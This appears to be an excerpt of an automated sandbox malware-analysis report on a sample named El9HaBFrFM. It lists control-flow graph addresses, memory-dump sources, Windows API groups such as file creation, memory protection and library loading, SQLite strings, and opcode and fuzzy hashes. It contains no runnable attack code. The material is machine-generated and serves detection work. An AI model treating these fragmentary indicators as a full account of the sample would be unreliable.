                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-4201244970
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2a9091ee9a96360e57c26c2fa3c70e94a5402815e56ef6d30e280918ea0e5405
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D326E22B0A7838AEB658F25D460B793791FB4AB94F484234DA6E477E8DF3CE455D300

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 981 7ff6ba3c6964-7ff6ba3c69d7 call 7ff6ba3c6698 984 7ff6ba3c69f1-7ff6ba3c69fb call 7ff6ba3b8520 981->984 985 7ff6ba3c69d9-7ff6ba3c69e2 call 7ff6ba3b4ee8 981->985 991 7ff6ba3c6a16-7ff6ba3c6a7f CreateFileW 984->991 992 7ff6ba3c69fd-7ff6ba3c6a14 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 984->992 990 7ff6ba3c69e5-7ff6ba3c69ec call 7ff6ba3b4f08 985->990 1008 7ff6ba3c6d32-7ff6ba3c6d52 990->1008 994 7ff6ba3c6a81-7ff6ba3c6a87 991->994 995 7ff6ba3c6afc-7ff6ba3c6b07 GetFileType 991->995 992->990 998 7ff6ba3c6ac9-7ff6ba3c6af7 GetLastError call 7ff6ba3b4e7c 994->998 999 7ff6ba3c6a89-7ff6ba3c6a8d 994->999 1001 7ff6ba3c6b09-7ff6ba3c6b44 GetLastError call 7ff6ba3b4e7c CloseHandle 995->1001 1002 7ff6ba3c6b5a-7ff6ba3c6b61 995->1002 998->990 999->998 1006 7ff6ba3c6a8f-7ff6ba3c6ac7 CreateFileW 999->1006 1001->990 1016 7ff6ba3c6b4a-7ff6ba3c6b55 call 7ff6ba3b4f08 1001->1016 1004 7ff6ba3c6b63-7ff6ba3c6b67 1002->1004 1005 7ff6ba3c6b69-7ff6ba3c6b6c 1002->1005 1011 7ff6ba3c6b72-7ff6ba3c6bc7 call 7ff6ba3b8438 1004->1011 1005->1011 1012 7ff6ba3c6b6e 1005->1012 1006->995 1006->998 1020 7ff6ba3c6bc9-7ff6ba3c6bd5 call 7ff6ba3c68a0 1011->1020 1021 7ff6ba3c6be6-7ff6ba3c6c17 call 7ff6ba3c6418 1011->1021 1012->1011 1016->990 1020->1021 1028 7ff6ba3c6bd7 1020->1028 1026 7ff6ba3c6c19-7ff6ba3c6c1b 1021->1026 1027 7ff6ba3c6c1d-7ff6ba3c6c5f 1021->1027 1029 7ff6ba3c6bd9-7ff6ba3c6be1 call 7ff6ba3baac0 1026->1029 1030 7ff6ba3c6c81-7ff6ba3c6c8c 1027->1030 1031 7ff6ba3c6c61-7ff6ba3c6c65 1027->1031 1028->1029 1029->1008 1033 7ff6ba3c6d30 1030->1033 1034 7ff6ba3c6c92-7ff6ba3c6c96 1030->1034 1031->1030 1032 7ff6ba3c6c67-7ff6ba3c6c7c 1031->1032 1032->1030 1033->1008 1034->1033 1036 7ff6ba3c6c9c-7ff6ba3c6ce1 CloseHandle CreateFileW 1034->1036 1038 7ff6ba3c6ce3-7ff6ba3c6d11 GetLastError call 7ff6ba3b4e7c call 7ff6ba3b8660 1036->1038 1039 7ff6ba3c6d16-7ff6ba3c6d2b 1036->1039 1038->1039 1039->1033
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d2f1252c068806c6d85274bc4632117b0a975a79953561aa522fd67421a244c7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40C1CF36B28B5286EB10CFA9C8906AC3B61FB49B98B415275DF1ED7795EF38D491C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257482350.00007FFDFB089000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAB80000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255962872.00007FFDFAB80000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAB81000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAB92000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFABA2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFABA8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFABF2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAC07000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAC17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAC1E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAC2C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAE0E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAEF9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAEFB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAF32000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAF6F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFB03B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFB070000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2256002845.00007FFDFB083000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257515754.00007FFDFB08A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfab80000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                        • String ID: )tP
                                                                                                                                                                                                                                                                                                                        • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                                                                                                        • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1ae45ece0e0a485ce9dc5faf4910d6ecee2e4b7ba2a6ac706bf570bfad1e080e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E62582272999286E715DF38D4106BD7790F749386F04A531EAAEC37D8EA3CEB44DB00

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 1895 7ffdfb144c70-7ffdfb144d41 call 7ffdfb1f380c 1898 7ffdfb144d43-7ffdfb144d56 1895->1898 1899 7ffdfb144d59-7ffdfb144d5d 1895->1899 1898->1899 1900 7ffdfb144d5f-7ffdfb144d78 call 7ffdfb0ca500 1899->1900 1901 7ffdfb144d7d-7ffdfb144d83 1899->1901 1912 7ffdfb1451ec-7ffdfb14521a call 7ffdfb1449c0 call 7ffdfb1f2900 1900->1912 1902 7ffdfb144d96-7ffdfb144d9e 1901->1902 1903 7ffdfb144d85-7ffdfb144d8f 1901->1903 1905 7ffdfb144da4-7ffdfb144daa 1902->1905 1906 7ffdfb144e81-7ffdfb144e89 1902->1906 1903->1902 1910 7ffdfb144db0-7ffdfb144db7 1905->1910 1911 7ffdfb144e7c 1905->1911 1908 7ffdfb144e93-7ffdfb144e96 1906->1908 1909 7ffdfb144e8b-7ffdfb144e8e call 7ffdfb15e660 1906->1909 1914 7ffdfb144e9c 1908->1914 1915 7ffdfb144f3b-7ffdfb144f43 call 7ffdfb17fc80 1908->1915 1909->1908 1917 7ffdfb144dc0-7ffdfb144dcc 1910->1917 1911->1906 1920 7ffdfb144e9e-7ffdfb144ea4 1914->1920 1921 7ffdfb144eaa-7ffdfb144eb1 1914->1921 1925 7ffdfb144f48-7ffdfb144f4b 1915->1925 1918 7ffdfb144e3e-7ffdfb144e49 1917->1918 1919 7ffdfb144dce-7ffdfb144dd2 1917->1919 1930 7ffdfb144e77 1918->1930 1931 7ffdfb144e4b-7ffdfb144e4d 1918->1931 1926 7ffdfb144dd4-7ffdfb144ddb 1919->1926 1927 7ffdfb144de7-7ffdfb144def 1919->1927 1920->1915 1920->1921 1928 7ffdfb144eb3-7ffdfb144ed6 call 7ffdfb0ca370 call 7ffdfb0c6d20 1921->1928 1929 7ffdfb144edb-7ffdfb144ede 1921->1929 1935 7ffdfb144f4d-7ffdfb144f54 1925->1935 1936 7ffdfb144f57-7ffdfb144f63 1925->1936 1926->1927 1932 7ffdfb144ddd-7ffdfb144de5 call 7ffdfb0dfef0 1926->1932 1927->1918 1937 7ffdfb144df1-7ffdfb144df8 1927->1937 1928->1912 1938 7ffdfb144ee0-7ffdfb144ef2 call 7ffdfb0c6880 1929->1938 1939 7ffdfb144f2e-7ffdfb144f39 1929->1939 1930->1911 1931->1917 1932->1927 1935->1936 1942 7ffdfb144fc8-7ffdfb144fcc 1936->1942 1943 7ffdfb144f65-7ffdfb144f71 1936->1943 1945 7ffdfb144e07-7ffdfb144e0e 1937->1945 1946 7ffdfb144dfa-7ffdfb144dfe 1937->1946 1938->1939 1965 7ffdfb144ef4-7ffdfb144f2c 00007FFE13343010 call 7ffdfb17fc80 call 7ffdfb0c6400 1938->1965 1939->1925 1947 7ffdfb144fce-7ffdfb144fdc 1942->1947 1948 7ffdfb144fe1-7ffdfb144fe7 1942->1948 1943->1942 1951 7ffdfb144f73-7ffdfb144f7d 1943->1951 1953 7ffdfb144e10-7ffdfb144e13 1945->1953 1954 7ffdfb144e2a 1945->1954 1946->1945 1952 7ffdfb144e00-7ffdfb144e05 1946->1952 1961 7ffdfb145118-7ffdfb14511b 1947->1961 1959 7ffdfb144fed-7ffdfb144ff0 1948->1959 1960 7ffdfb145184-7ffdfb1451a2 1948->1960 1963 7ffdfb144f7f 1951->1963 1964 7ffdfb144f89-7ffdfb144f8f 1951->1964 1958 7ffdfb144e2c-7ffdfb144e30 1952->1958 1956 7ffdfb144e21-7ffdfb144e28 1953->1956 1957 7ffdfb144e15-7ffdfb144e19 1953->1957 1954->1958 1956->1953 1956->1954 1957->1956 1966 7ffdfb144e1b-7ffdfb144e1f 1957->1966 1968 7ffdfb144e32-7ffdfb144e35 call 7ffdfb0dfec0 1958->1968 1969 7ffdfb144e3a-7ffdfb144e3c 1958->1969 1959->1960 1970 7ffdfb144ff6-7ffdfb144ffb 1959->1970 1971 7ffdfb1451bf-7ffdfb1451c6 1960->1971 1972 7ffdfb1451a4-7ffdfb1451ad 1960->1972 1973 7ffdfb14511d-7ffdfb145120 call 7ffdfb0f59e0 1961->1973 1974 7ffdfb145125-7ffdfb145131 1961->1974 1963->1964 1975 7ffdfb144f91-7ffdfb144fa3 call 7ffdfb0c6880 1964->1975 1976 7ffdfb144fba 1964->1976 1965->1925 1966->1952 1966->1956 1968->1969 1969->1918 1984 7ffdfb144e52-7ffdfb144e72 call 7ffdfb0ca370 1969->1984 1970->1961 1980 7ffdfb145001-7ffdfb145008 1970->1980 1971->1912 1988 7ffdfb1451c8 1971->1988 1981 7ffdfb1451af-7ffdfb1451b7 call 7ffdfb0f0600 1972->1981 1982 7ffdfb1451b9 1972->1982 1973->1974 1985 7ffdfb145133-7ffdfb14514c call 7ffdfb0ca370 1974->1985 1986 7ffdfb145158-7ffdfb145161 1974->1986 1978 7ffdfb144fbc-7ffdfb144fc3 1975->1978 1998 7ffdfb144fa5-7ffdfb144fb8 00007FFE13343010 1975->1998 1976->1978 1978->1942 1980->1961 1994 7ffdfb14500e-7ffdfb14501a 1980->1994 1981->1971 1982->1971 1984->1912 1985->1971 2010 7ffdfb14514e-7ffdfb145156 call 7ffdfb0c6400 1985->2010 1991 7ffdfb145163-7ffdfb14516b 1986->1991 1992 7ffdfb145176-7ffdfb145182 call 7ffdfb0ca250 1986->1992 1997 7ffdfb1451d0-7ffdfb1451ea call 7ffdfb0c6400 1988->1997 1991->1992 2001 7ffdfb14516d-7ffdfb145174 1991->2001 1992->1971 1994->1961 2003 7ffdfb145020-7ffdfb14502d 1994->2003 1997->1912 1998->1978 2001->1971 2009 7ffdfb145030-7ffdfb145044 2003->2009 2011 7ffdfb1450fd-7ffdfb145108 2009->2011 2012 7ffdfb14504a-7ffdfb14504e 2009->2012 2010->1971 2011->2009 2015 7ffdfb14510e-7ffdfb145113 2011->2015 2016 7ffdfb145050-7ffdfb145062 call 7ffdfb0e3790 2012->2016 2017 7ffdfb145088-7ffdfb145090 2012->2017 2015->1961 2025 7ffdfb145064-7ffdfb145069 2016->2025 2026 7ffdfb14506b-7ffdfb145073 call 7ffdfb0c6c40 2016->2026 2018 7ffdfb1450a3-7ffdfb1450b6 2017->2018 2019 7ffdfb145092-7ffdfb145099 2017->2019 2023 7ffdfb1450b8-7ffdfb1450bc 2018->2023 2024 7ffdfb1450c6-7ffdfb1450d2 2018->2024 2019->2018 2022 7ffdfb14509b-7ffdfb14509e call 7ffdfb0dfef0 2019->2022 2022->2018 2023->2024 2030 7ffdfb1450be-7ffdfb1450c1 call 7ffdfb0dfec0 2023->2030 2027 7ffdfb1450ee-7ffdfb1450f3 2024->2027 2028 7ffdfb1450d4-7ffdfb1450e9 call 7ffdfb121280 2024->2028 2025->2026 2034 7ffdfb145077-7ffdfb14507a 2025->2034 2026->2034 2027->2011 2033 7ffdfb1450f5-7ffdfb1450f8 call 7ffdfb0e4b80 2027->2033 2028->2027 2030->2024 2033->2011 2034->2015 2038 7ffdfb145080 2034->2038 2038->2017
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-1046679716
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5f1ed2cf7854032140295e853257be1f4e8840fdc1ac63dfef037a0e430abe56
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3F17123F0A683C6EB258F259424BBA6B90FB46B48F084135DA6D077EDDF7CE6508740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f708a7ead3872cebc14767bbb6c7a1c563da75f74a967b7d3400e12b77275a50
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3962062271829286E7198B38D4907B977E0F748785F845535EAAEC37C9EA3CEE45CB10
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: :memory:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2920599690
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d158ba6bdcfd1d67072cc4d23b95b7b5ae2ced07bbb9c01723f0e9ed9192fff
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 36cf7ce6ba532f3282d16ad89b1e65c377a4700778bee790394a7c93efad0d33
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d158ba6bdcfd1d67072cc4d23b95b7b5ae2ced07bbb9c01723f0e9ed9192fff
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55427F62B0A78786FB25AB259560B7967A0FF46B84F044135DE6D837F8DF3CE8949300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1227d9f2ab5e5c76a0d82599c0af93e2b57c6a6d221941aecb0d24f7cfe87dc5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97F0C822A1874586FB608F68F49876E7790AB84364F040335DFAED26D4DF3CD048CB00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6de061bb28b1c28eb81710457d69f78760ddcac9f73fd9d2dd56c33a1b411327
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CA1C521B0FB4785FF588B45A874A7422A0BF4AB44F944635ED2EC67F8DF6CE8919340

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
